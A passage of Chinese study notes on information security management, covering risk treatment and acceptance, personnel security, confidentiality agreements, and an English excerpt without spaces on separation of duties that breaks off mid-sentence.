和机构采取法律行动，改进控制措施防止此类事件再次发生等；我国实施的“物理隔离”就是规避风险的一种措施，由于业务活动的要求，不是所有的风险都可以规避；国内保险品种较少，这方面的选择多是对固定资产损失风险的转移；低风险和中等风险有时可以接受。要将残留风险控制在比较低的水平需增加控制措施的投入成本，如果决策者原因冒较高的风险就可以节省这些成本，这与企业或企业决策者的风险偏好有关，不过不管风险偏好如何，都应该符合适度谨慎和适度勤勉的管理原则；比如如果将中等风险降低为低风险需要付出很大的控制成本，决策者可以选择接受中等风险，但如果将中等风险降低为低风险只需付出很少成本，决策者就应该选择将风险降低到低风险。简述人在信息安全中的关键性作用，包括内部人员对安全的威胁；人是安全保障的决定性因素，举例SOC的实践，所以人员的培训是最重要的安全控制措施之一，最后我们要讲到这个问题；人的安全问题是信息安全的首要问题，凡是由于信息系统故障或遭破坏可能导致人健康和生命损失的，这种系统安全性都应重点保护，任何安全措施都不应妨碍紧急情况下人的疏散，信息安全措施不应过度侵犯个人隐私；背景调查的力度应与职务的敏感程度相当；保安等具有较高物理安全特权和系统管理人员等具有较高系统特权的人，以及其它能够接触到敏感信息的人都属于敏感岗位；不应雇佣有犯罪记录和非法攻击他人网络的黑客；第三方服务人员也应进行类似调查。保密协议属于指导型控制，必须与其它控制手段配合才能达到一定的保护等级；保密协议可能在以后涉及的法律纠纷中有一定意义，但相关当事人承担的法律责任还是由现行法律而部署保密协议确定；所以只能将保密协议做为层次化防御体现的一个环节，而不是主要的防御措施，之所以机构常使用这种手段，原因在于这种手段的成本很低，具有成本效益。Separationofduties(alsocalledsegregationofduties)assignspartsoftaskstodifferentpersonnel.Thus,ifnosinglepersonhastotalcontrolofthesystem’ssecuritymechanisms,thetheoryisthatnosinglepersoncancompletelycompromisethesystem.Inmanysystems,asystemadministratorhastotalcontrolofthesystem’sadministrationandsecurityfunctions.Thisconsolidationofprivilegeshouldnotbeallowedinasecuresystembecausesecuritytasksandfunctionsshouldnotautomaticallybeassignedtotheroleofthesystemadministrator.Inhighlysecuresystems,threedistinctadministrativerolesmightberequired:asystemadministrator,asecurityadministratorwhoisusuallyaninformationsystemsecurityofficer(ISSO),andanenhancedoperatorfunction.Thesecurityadministrator,systemadministrator,andoperatormightnotnecessarilybedifferentpersonnel.However,w